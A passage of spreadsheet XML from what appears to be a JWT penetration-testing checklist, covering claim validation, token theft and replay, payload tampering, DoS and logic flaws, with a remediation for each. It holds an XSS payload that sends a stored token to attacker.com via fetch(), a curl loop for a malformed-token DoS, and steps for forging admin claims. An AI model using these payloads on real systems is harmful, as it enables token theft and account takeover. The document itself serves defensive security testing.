      <c r="D21" s="6" t="inlineStr">
        <is>
          <t>Claim Validation</t>
        </is>
      </c>
      <c r="E21" s="11" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="F21" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G21" s="6" t="inlineStr">
        <is>
          <t>jwt.io, Burp Suite</t>
        </is>
      </c>
      <c r="H21" s="6" t="inlineStr">
        <is>
          <t>1. Decode JWT.
2. Check 'exp' value: (exp - iat) &gt; 86400 seconds?
3. If expiry &gt; 24h, flag as long-lived.
4. Attempt to use token after expected session termination.</t>
        </is>
      </c>
      <c r="I21" s="6" t="inlineStr">
        <is>
          <t>Token valid for days/weeks; usable long after user logout or privilege change.</t>
        </is>
      </c>
      <c r="J21" s="6" t="inlineStr">
        <is>
          <t>Token expires within 15–60 minutes; refresh token mechanism in use.</t>
        </is>
      </c>
      <c r="K21" s="6" t="inlineStr">
        <is>
          <t>Set access token expiry to 15 minutes. Use refresh tokens for session continuity.</t>
        </is>
      </c>
      <c r="L21" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="22" ht="110" customHeight="1">
      <c r="B22" s="4" t="n">
        <v>18</v>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>Missing iss (Issuer) Validation</t>
        </is>
      </c>
      <c r="D22" s="6" t="inlineStr">
        <is>
          <t>Claim Validation</t>
        </is>
      </c>
      <c r="E22" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F22" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G22" s="6" t="inlineStr">
        <is>
          <t>jwt_tool, Burp Suite, custom Python</t>
        </is>
      </c>
      <c r="H22" s="6" t="inlineStr">
        <is>
          <t>1. Obtain token from Service A.
2. Change 'iss' claim to a rogue value or different service name.
3. Replay at Service B.
4. Also try: issue token from a test/dev environment and replay to prod.</t>
        </is>
      </c>
      <c r="I22" s="6" t="inlineStr">
        <is>
          <t>Server accepts token regardless of issuer; cross-environment token reuse works.</t>
        </is>
      </c>
      <c r="J22" s="6" t="inlineStr">
        <is>
          <t>Server validates iss strictly; rejects unrecognized issuers.</t>
        </is>
      </c>
      <c r="K22" s="6" t="inlineStr">
        <is>
          <t>Validate iss claim against an explicit allowlist. Use environment-specific issuers.</t>
        </is>
      </c>
      <c r="L22" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="23" ht="110" customHeight="1">
      <c r="B23" s="4" t="n">
        <v>19</v>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>Missing aud (Audience) Validation</t>
        </is>
      </c>
      <c r="D23" s="6" t="inlineStr">
        <is>
          <t>Claim Validation</t>
        </is>
      </c>
      <c r="E23" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F23" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G23" s="6" t="inlineStr">
        <is>
          <t>jwt_tool, Burp Suite</t>
        </is>
      </c>
      <c r="H23" s="6" t="inlineStr">
        <is>
          <t>1. Obtain JWT intended for Service A.
2. Replay same token against Service B endpoint.
3. Also try modifying 'aud' claim to Service B and replaying.</t>
        </is>
      </c>
      <c r="I23" s="6" t="inlineStr">
        <is>
          <t>Service B accepts token intended for Service A; unauthorized cross-service access.</t>
        </is>
      </c>
      <c r="J23" s="6" t="inlineStr">
        <is>
          <t>Service B rejects token with wrong audience (401/403).</t>
        </is>
      </c>
      <c r="K23" s="6" t="inlineStr">
        <is>
          <t>Each service must validate aud claim matches its own identifier. Use strict audience lists.</t>
        </is>
      </c>
      <c r="L23" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="24" ht="110" customHeight="1">
      <c r="B24" s="4" t="n">
        <v>20</v>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>Issuer Array Bypass (CVE-2025-30144)</t>
        </is>
      </c>
      <c r="D24" s="6" t="inlineStr">
        <is>
          <t>Claim Validation</t>
        </is>
      </c>
      <c r="E24" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F24" s="9" t="inlineStr">
        <is>
          <t>CVE-2025-30144</t>
        </is>
      </c>
      <c r="G24" s="6" t="inlineStr">
        <is>
          <t>jwt_tool, custom Python (fast-jwt context)</t>
        </is>
      </c>
      <c r="H24" s="6" t="inlineStr">
        <is>
          <t>1. Craft token with 'iss' as JSON array: ["legitimate-issuer","attacker-issuer"].
2. Sign with any available key.
3. Replay token against fast-jwt-based service.</t>
        </is>
      </c>
      <c r="I24" s="6" t="inlineStr">
        <is>
          <t>Library accepts array iss; attacker issuer included alongside legitimate one.</t>
        </is>
      </c>
      <c r="J24" s="6" t="inlineStr">
        <is>
          <t>Library rejects non-string iss; single string enforced.</t>
        </is>
      </c>
      <c r="K24" s="6" t="inlineStr">
        <is>
          <t>Upgrade fast-jwt to patched version. Validate iss is a string, not array.</t>
        </is>
      </c>
      <c r="L24" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="25" ht="110" customHeight="1">
      <c r="B25" s="4" t="n">
        <v>21</v>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>Missing nbf (Not-Before) Check</t>
        </is>
      </c>
      <c r="D25" s="6" t="inlineStr">
        <is>
          <t>Claim Validation</t>
        </is>
      </c>
      <c r="E25" s="12" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="F25" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G25" s="6" t="inlineStr">
        <is>
          <t>jwt_tool, Burp Suite</t>
        </is>
      </c>
      <c r="H25" s="6" t="inlineStr">
        <is>
          <t>1. Obtain or craft a token with 'nbf' set to future timestamp.
2. Replay token before nbf time has elapsed.</t>
        </is>
      </c>
      <c r="I25" s="6" t="inlineStr">
        <is>
          <t>Server accepts token before its intended valid period begins.</t>
        </is>
      </c>
      <c r="J25" s="6" t="inlineStr">
        <is>
          <t>Server returns 401: token not yet valid.</t>
        </is>
      </c>
      <c r="K25" s="6" t="inlineStr">
        <is>
          <t>Validate nbf claim to prevent premature token use.</t>
        </is>
      </c>
      <c r="L25" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="26" ht="110" customHeight="1">
      <c r="B26" s="4" t="n">
        <v>22</v>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>sub Claim Not Bound to Session</t>
        </is>
      </c>
      <c r="D26" s="6" t="inlineStr">
        <is>
          <t>Claim Validation</t>
        </is>
      </c>
      <c r="E26" s="11" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="F26" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G26" s="6" t="inlineStr">
        <is>
          <t>Burp Suite, jwt_tool</t>
        </is>
      </c>
      <c r="H26" s="6" t="inlineStr">
        <is>
          <t>1. Obtain JWT for User A.
2. Replay token from a different IP/session/device.
3. Check if server enforces session binding (device fingerprint, IP, session ID).</t>
        </is>
      </c>
      <c r="I26" s="6" t="inlineStr">
        <is>
          <t>Token works from any session/device; no binding enforced.</t>
        </is>
      </c>
      <c r="J26" s="6" t="inlineStr">
        <is>
          <t>Server enforces session context; cross-session reuse rejected.</t>
        </is>
      </c>
      <c r="K26" s="6" t="inlineStr">
        <is>
          <t>Bind tokens to session context (device ID, IP range). Implement token binding (RFC 8471).</t>
        </is>
      </c>
      <c r="L26" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="27" ht="110" customHeight="1">
      <c r="B27" s="4" t="n">
        <v>23</v>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>Token Replay Attack</t>
        </is>
      </c>
      <c r="D27" s="6" t="inlineStr">
        <is>
          <t>Token Theft &amp; Replay</t>
        </is>
      </c>
      <c r="E27" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F27" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G27" s="6" t="inlineStr">
        <is>
          <t>Burp Suite Repeater, curl, OWASP ZAP</t>
        </is>
      </c>
      <c r="H27" s="6" t="inlineStr">
        <is>
          <t>1. Capture valid JWT via proxy.
2. In Burp Repeater, replay captured request with same token.
3. Change endpoint or action (e.g., re-trigger payment, re-use one-time action).
4. Check if server has seen/blacklisted this token.</t>
        </is>
      </c>
      <c r="I27" s="6" t="inlineStr">
        <is>
          <t>Server accepts replayed token; action executed multiple times.</t>
        </is>
      </c>
      <c r="J27" s="6" t="inlineStr">
        <is>
          <t>Server detects replay (jti blocklist); returns 401 on second use.</t>
        </is>
      </c>
      <c r="K27" s="6" t="inlineStr">
        <is>
          <t>Implement jti (JWT ID) claim and maintain a server-side used-token blocklist.</t>
        </is>
      </c>
      <c r="L27" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="28" ht="110" customHeight="1">
      <c r="B28" s="4" t="n">
        <v>24</v>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>XSS-Based Token Theft</t>
        </is>
      </c>
      <c r="D28" s="6" t="inlineStr">
        <is>
          <t>Token Theft &amp; Replay</t>
        </is>
      </c>
      <c r="E28" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F28" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G28" s="6" t="inlineStr">
        <is>
          <t>Burp Suite, XSS payload library, OWASP ZAP</t>
        </is>
      </c>
      <c r="H28" s="6" t="inlineStr">
        <is>
          <t>1. Identify XSS vector in application.
2. Inject: &lt;script&gt;fetch('https://attacker.com/?t='+localStorage.getItem('token'))&lt;/script&gt;
3. Check if JWT stored in localStorage is exfiltrated.
4. Use captured token to impersonate user.</t>
        </is>
      </c>
      <c r="I28" s="6" t="inlineStr">
        <is>
          <t>JWT exfiltrated from localStorage via XSS; full account takeover.</t>
        </is>
      </c>
      <c r="J28" s="6" t="inlineStr">
        <is>
          <t>Token stored in httpOnly cookie; XSS cannot access it via JS.</t>
        </is>
      </c>
      <c r="K28" s="6" t="inlineStr">
        <is>
          <t>Store JWTs in httpOnly, Secure, SameSite=Strict cookies. Never in localStorage.</t>
        </is>
      </c>
      <c r="L28" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="29" ht="110" customHeight="1">
      <c r="B29" s="4" t="n">
        <v>25</v>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>MITM Token Interception</t>
        </is>
      </c>
      <c r="D29" s="6" t="inlineStr">
        <is>
          <t>Token Theft &amp; Replay</t>
        </is>
      </c>
      <c r="E29" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F29" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G29" s="6" t="inlineStr">
        <is>
          <t>Wireshark, mitmproxy, Burp Suite</t>
        </is>
      </c>
      <c r="H29" s="6" t="inlineStr">
        <is>
          <t>1. Set up mitmproxy between client and server.
2. Send request over HTTP (or broken HTTPS).
3. Capture Authorization header containing JWT.
4. Reuse intercepted token.</t>
        </is>
      </c>
      <c r="I29" s="6" t="inlineStr">
        <is>
          <t>JWT captured in transit; attacker reuses token for unauthorized access.</t>
        </is>
      </c>
      <c r="J29" s="6" t="inlineStr">
        <is>
          <t>TLS enforced; token not visible in transit.</t>
        </is>
      </c>
      <c r="K29" s="6" t="inlineStr">
        <is>
          <t>Enforce HTTPS/TLS everywhere. Use HSTS. Never transmit tokens over plain HTTP.</t>
        </is>
      </c>
      <c r="L29" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="30" ht="110" customHeight="1">
      <c r="B30" s="4" t="n">
        <v>26</v>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>No Token Invalidation on Logout (CVE-2025-4643)</t>
        </is>
      </c>
      <c r="D30" s="6" t="inlineStr">
        <is>
          <t>Token Theft &amp; Replay</t>
        </is>
      </c>
      <c r="E30" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F30" s="9" t="inlineStr">
        <is>
          <t>CVE-2025-4643</t>
        </is>
      </c>
      <c r="G30" s="6" t="inlineStr">
        <is>
          <t>Burp Suite Repeater, curl</t>
        </is>
      </c>
      <c r="H30" s="6" t="inlineStr">
        <is>
          <t>1. Log in and capture JWT.
2. Perform logout action.
3. Replay captured JWT in a new request after logout.
4. Check if server honours the old token.</t>
        </is>
      </c>
      <c r="I30" s="6" t="inlineStr">
        <is>
          <t>Token remains valid post-logout; session effectively never ends.</t>
        </is>
      </c>
      <c r="J30" s="6" t="inlineStr">
        <is>
          <t>Server returns 401; token invalidated on logout.</t>
        </is>
      </c>
      <c r="K30" s="6" t="inlineStr">
        <is>
          <t>Maintain server-side token blocklist. On logout, add jti to blocklist until exp.</t>
        </is>
      </c>
      <c r="L30" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="31" ht="110" customHeight="1">
      <c r="B31" s="4" t="n">
        <v>27</v>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>Refresh Token Reuse</t>
        </is>
      </c>
      <c r="D31" s="6" t="inlineStr">
        <is>
          <t>Token Theft &amp; Replay</t>
        </is>
      </c>
      <c r="E31" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F31" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G31" s="6" t="inlineStr">
        <is>
          <t>Burp Suite, curl, Postman</t>
        </is>
      </c>
      <c r="H31" s="6" t="inlineStr">
        <is>
          <t>1. Obtain refresh token.
2. Use it once to get new access token.
3. Replay same refresh token again.
4. Check if second rotation succeeds.</t>
        </is>
      </c>
      <c r="I31" s="6" t="inlineStr">
        <is>
          <t>Refresh token reused; attacker can generate unlimited access tokens.</t>
        </is>
      </c>
      <c r="J31" s="6" t="inlineStr">
        <is>
          <t>Second use of refresh token returns 400/401; token rotated and invalidated.</t>
        </is>
      </c>
      <c r="K31" s="6" t="inlineStr">
        <is>
          <t>Implement refresh token rotation. Invalidate old refresh tokens on use. Detect reuse as attack signal.</t>
        </is>
      </c>
      <c r="L31" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="32" ht="110" customHeight="1">
      <c r="B32" s="4" t="n">
        <v>28</v>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>Payload Tampering (No Sig Check)</t>
        </is>
      </c>
      <c r="D32" s="6" t="inlineStr">
        <is>
          <t>Payload &amp; Structural</t>
        </is>
      </c>
      <c r="E32" s="7" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="F32" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G32" s="6" t="inlineStr">
        <is>
          <t>jwt.io, CyberChef, Burp Suite</t>
        </is>
      </c>
      <c r="H32" s="6" t="inlineStr">
        <is>
          <t>1. Decode JWT payload (base64 decode middle section).
2. Modify claims: {"role":"admin","sub":"victim_user"}
3. Re-encode with base64url (no padding).
4. Replace payload in original token.
5. Send with original header and signature.</t>
        </is>
      </c>
      <c r="I32" s="6" t="inlineStr">
        <is>
          <t>Server processes modified payload without verifying signature; privilege escalation.</t>
        </is>
      </c>
      <c r="J32" s="6" t="inlineStr">
        <is>
          <t>Server returns 401; signature validation fails on tampered payload.</t>
        </is>
      </c>
      <c r="K32" s="6" t="inlineStr">
        <is>
          <t>Always cryptographically verify signature before processing any claim.</t>
        </is>
      </c>
      <c r="L32" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="33" ht="110" customHeight="1">
      <c r="B33" s="4" t="n">
        <v>29</v>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>Sensitive Data in Payload</t>
        </is>
      </c>
      <c r="D33" s="6" t="inlineStr">
        <is>
          <t>Payload &amp; Structural</t>
        </is>
      </c>
      <c r="E33" s="11" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="F33" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G33" s="6" t="inlineStr">
        <is>
          <t>jwt.io, CyberChef, Burp Suite</t>
        </is>
      </c>
      <c r="H33" s="6" t="inlineStr">
        <is>
          <t>1. Capture JWT from Authorization header.
2. Base64-decode the payload section.
3. Inspect for: passwords, PII, internal IDs, API keys, connection strings.</t>
        </is>
      </c>
      <c r="I33" s="6" t="inlineStr">
        <is>
          <t>Sensitive data (PW hash, email, SSN, internal key) visible in decoded payload.</t>
        </is>
      </c>
      <c r="J33" s="6" t="inlineStr">
        <is>
          <t>Payload contains only non-sensitive identifiers (sub, role, exp, jti).</t>
        </is>
      </c>
      <c r="K33" s="6" t="inlineStr">
        <is>
          <t>Never store sensitive data in JWT payload. It is encoded, NOT encrypted. Use JWE for confidential claims.</t>
        </is>
      </c>
      <c r="L33" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="34" ht="110" customHeight="1">
      <c r="B34" s="4" t="n">
        <v>30</v>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>Nested JWT / JWE Confusion</t>
        </is>
      </c>
      <c r="D34" s="6" t="inlineStr">
        <is>
          <t>Payload &amp; Structural</t>
        </is>
      </c>
      <c r="E34" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F34" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G34" s="6" t="inlineStr">
        <is>
          <t>python-jose, custom Python, Burp Suite</t>
        </is>
      </c>
      <c r="H34" s="6" t="inlineStr">
        <is>
          <t>1. Craft a JWE token containing a malicious JWS as inner payload.
2. Present to endpoint that processes nested tokens.
3. Check if outer JWE is decrypted but inner JWS signature is skipped.</t>
        </is>
      </c>
      <c r="I34" s="6" t="inlineStr">
        <is>
          <t>Server decrypts JWE but skips JWS verification; forged claims processed.</t>
        </is>
      </c>
      <c r="J34" s="6" t="inlineStr">
        <is>
          <t>Server validates both outer and inner token layers correctly.</t>
        </is>
      </c>
      <c r="K34" s="6" t="inlineStr">
        <is>
          <t>Explicitly validate all layers of nested tokens. Don't assume inner tokens are trusted.</t>
        </is>
      </c>
      <c r="L34" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="35" ht="110" customHeight="1">
      <c r="B35" s="4" t="n">
        <v>31</v>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>Malformed Token DoS (CVE-2025-27144)</t>
        </is>
      </c>
      <c r="D35" s="6" t="inlineStr">
        <is>
          <t>Payload &amp; Structural</t>
        </is>
      </c>
      <c r="E35" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F35" s="9" t="inlineStr">
        <is>
          <t>CVE-2025-27144</t>
        </is>
      </c>
      <c r="G35" s="6" t="inlineStr">
        <is>
          <t>curl, custom Python, wrk/ab</t>
        </is>
      </c>
      <c r="H35" s="6" t="inlineStr">
        <is>
          <t>1. Craft JWT with 1000+ dots: 'aaa.bbb.ccc.ddd.eee....'
2. Send to target endpoint repeatedly.
3. Monitor memory usage and response times on server.
4. Use: for i in {1..100}; do curl -H 'Auth: &lt;malformed&gt;' target; done</t>
        </is>
      </c>
      <c r="I35" s="6" t="inlineStr">
        <is>
          <t>Server memory spikes; OOM or extreme latency; DoS achieved (Go JOSE affected).</t>
        </is>
      </c>
      <c r="J35" s="6" t="inlineStr">
        <is>
          <t>Server returns 400 on malformed token; memory stable.</t>
        </is>
      </c>
      <c r="K35" s="6" t="inlineStr">
        <is>
          <t>Upgrade Go JOSE library. Add token structure pre-validation (max 3 dots) before parsing.</t>
        </is>
      </c>
      <c r="L35" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="36" ht="110" customHeight="1">
      <c r="B36" s="4" t="n">
        <v>32</v>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>Timing-Based Signature Attack</t>
        </is>
      </c>
      <c r="D36" s="6" t="inlineStr">
        <is>
          <t>Timing &amp; Side-Channel</t>
        </is>
      </c>
      <c r="E36" s="11" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="F36" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G36" s="6" t="inlineStr">
        <is>
          <t>custom Python (requests + timing), timing_attack libs</t>
        </is>
      </c>
      <c r="H36" s="6" t="inlineStr">
        <is>
          <t>1. Send tokens with signatures differing by 1 byte.
2. Measure server response time for each.
3. If non-constant-time comparison used, correct prefix bytes take slightly longer.
4. Iterate byte-by-byte across full signature.
5. Use statistical analysis across 1000+ samples per byte.</t>
        </is>
      </c>
      <c r="I36" s="6" t="inlineStr">
        <is>
          <t>Timing differences statistically correlate with correct signature bytes; signature reconstructed.</t>
        </is>
      </c>
      <c r="J36" s="6" t="inlineStr">
        <is>
          <t>Response times are statistically uniform across all inputs (constant-time comparison).</t>
        </is>
      </c>
      <c r="K36" s="6" t="inlineStr">
        <is>
          <t>Use constant-time comparison (hmac.compare_digest in Python). Never use == for MAC comparison.</t>
        </is>
      </c>
      <c r="L36" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="37" ht="110" customHeight="1">
      <c r="B37" s="4" t="n">
        <v>33</v>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>Token Disclosure via Verbose Errors</t>
        </is>
      </c>
      <c r="D37" s="6" t="inlineStr">
        <is>
          <t>Timing &amp; Side-Channel</t>
        </is>
      </c>
      <c r="E37" s="12" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="F37" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G37" s="6" t="inlineStr">
        <is>
          <t>Burp Suite, curl, manual testing</t>
        </is>
      </c>
      <c r="H37" s="6" t="inlineStr">
        <is>
          <t>1. Send malformed/expired/invalid token.
2. Inspect error response body and headers.
3. Look for: algorithm names, key IDs, library versions, stack traces, token parsing details.</t>
        </is>
      </c>
      <c r="I37" s="6" t="inlineStr">
        <is>
          <t>Error message reveals: algorithm used, key ID, internal library info, or token structure hints.</t>
        </is>
      </c>
      <c r="J37" s="6" t="inlineStr">
        <is>
          <t>Generic error returned: 401 Unauthorized. No implementation details leaked.</t>
        </is>
      </c>
      <c r="K37" s="6" t="inlineStr">
        <is>
          <t>Return generic error messages. Log details server-side only. Suppress stack traces in production.</t>
        </is>
      </c>
      <c r="L37" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="38" ht="110" customHeight="1">
      <c r="B38" s="4" t="n">
        <v>34</v>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>Cross-Service Token Reuse</t>
        </is>
      </c>
      <c r="D38" s="6" t="inlineStr">
        <is>
          <t>Misc / Logic Flaws</t>
        </is>
      </c>
      <c r="E38" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F38" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G38" s="6" t="inlineStr">
        <is>
          <t>Burp Suite, curl, Postman</t>
        </is>
      </c>
      <c r="H38" s="6" t="inlineStr">
        <is>
          <t>1. Obtain JWT from Service A (e.g., chat service).
2. Replay same token against Service B (e.g., payment service).
3. Check if Service B accepts token issued by Service A.</t>
        </is>
      </c>
      <c r="I38" s="6" t="inlineStr">
        <is>
          <t>Service B accepts token from Service A; unauthorized cross-service access.</t>
        </is>
      </c>
      <c r="J38" s="6" t="inlineStr">
        <is>
          <t>Service B rejects token: audience mismatch (401/403).</t>
        </is>
      </c>
      <c r="K38" s="6" t="inlineStr">
        <is>
          <t>Each service must validate 'aud' claim. Issue service-specific tokens.</t>
        </is>
      </c>
      <c r="L38" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="39" ht="110" customHeight="1">
      <c r="B39" s="4" t="n">
        <v>35</v>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>Token Sidejacking</t>
        </is>
      </c>
      <c r="D39" s="6" t="inlineStr">
        <is>
          <t>Misc / Logic Flaws</t>
        </is>
      </c>
      <c r="E39" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F39" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G39" s="6" t="inlineStr">
        <is>
          <t>Burp Suite, mitmproxy, XSS tools</t>
        </is>
      </c>
      <c r="H39" s="6" t="inlineStr">
        <is>
          <t>1. Inject attacker session reference into victim's JWT context via XSS or CSRF.
2. Victim authenticates; token bound to attacker's session.
3. Attacker uses own session to access victim's data.</t>
        </is>
      </c>
      <c r="I39" s="6" t="inlineStr">
        <is>
          <t>Victim's authenticated session hijacked; attacker gains access to victim account.</t>
        </is>
      </c>
      <c r="J39" s="6" t="inlineStr">
        <is>
          <t>Token includes user-bound claims (sub, fingerprint); session fixation prevented.</t>
        </is>
      </c>
      <c r="K39" s="6" t="inlineStr">
        <is>
          <t>Bind JWTs to a unique per-session identifier. Regenerate session on authentication.</t>
        </is>
      </c>
      <c r="L39" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="40" ht="110" customHeight="1">
      <c r="B40" s="4" t="n">
        <v>36</v>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>Claim Pollution / Override</t>
        </is>
      </c>
      <c r="D40" s="6" t="inlineStr">
        <is>
          <t>Misc / Logic Flaws</t>
        </is>
      </c>
      <c r="E40" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F40" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G40" s="6" t="inlineStr">
        <is>
          <t>Burp Suite, curl, manual crafting</t>
        </is>
      </c>
      <c r="H40" s="6" t="inlineStr">
        <is>
          <t>1. Find endpoint that merges JWT claims with query parameters.
2. Add URL param: ?role=admin or ?sub=admin_user
3. Check if query param overrides JWT claim in server logic.
4. Also test: POST body params, JSON body keys.</t>
        </is>
      </c>
      <c r="I40" s="6" t="inlineStr">
        <is>
          <t>Query/body parameter overrides JWT claim; privilege escalation via parameter injection.</t>
        </is>
      </c>
      <c r="J40" s="6" t="inlineStr">
        <is>
          <t>Server strictly uses JWT claims only; request params do not override token claims.</t>
        </is>
      </c>
      <c r="K40" s="6" t="inlineStr">
        <is>
          <t>Never merge request parameters with JWT claims. JWT claims are authoritative; ignore overrides.</t>
        </is>
      </c>
      <c r="L40" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="42" ht="14" customHeight="1">
      <c r="B42" s="13" t="inlineStr">
        <is>
          <t>Sources: PortSwigger Web Security Academy | jwt_tool (ticarpi) | OWASP WSTG | Black Hat 2023 | CVE NVD | Pentesterlab | Intigriti | RedSentry 2026</t>
        </is>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="B2:L2"/>
    <mergeCell ref="B42:L42"/>
    <mergeCell ref="B1:L1"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation sqref="L5:L40" showDropDown="0" showInputMessage="0" showErrorMessage="0" allowBlank="0" type="list">
      <formula1>"☐ Not Tested,✓ Tested,⚠ Vulnerable,✗ Not Applicable"</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2E7D32"/>
    <outlinePr summaryBelow="1" summaryRight="1"/>
    <pageSetUpPr/>
  </sheetPr>
  <dimension ref="B1:G18"/>
  <sheetViews>
    <sheetView showGridLines="0" workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
  <cols>
    <col width="3" customWidth="1" min="1" max="1"/>
    <col width="22" customWidth="1" min="2" max="2"/>
    <col width="16" customWidth="1" min="3" max="3"/>
    <col width="32" customWidth="1" min="4" max="4"/>
    <col width="28" customWidth="1" min="5" max="5"/>
    <col width="45" customWidth="1" min="6" max="6"/>
    <col width="35" customWidth="1" min="7" max="7"/>
  </cols>
  <sheetData>
    <row r="1" ht="32" customHeight="1">
      <c r="B1" s="1" t="inlineStr">
        <is>
          <t>JWT Testing Tools Reference</t>
        </is>
      </c>
    </row>
    <row r="3" ht="24" customHeight="1">
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>Tool</t>
        </is>
      </c>
      <c r="C3" s="3" t="inlineStr">
        <is>
          <t>Type</t>
        </is>
      </c>
      <c r="D3" s="3" t="inlineStr">
        <is>
          <t>Install / Source</t>
        </is>
      </c>
      <c r="E3" s="3" t="inlineStr">
        <is>
          <t>Primary Use</t>
        </is>
      </c>
      <c r="F3" s="3" t="inlineStr">
        <is>
          <t>Key Commands / Notes</t>
        </is>
      </c>
      <c r="G3" s="3" t="inlineStr">
        <is>
          <t>Link</t>
        </is>
      </c>
    </row>
    <row r="4" ht="65" customHeight="1">
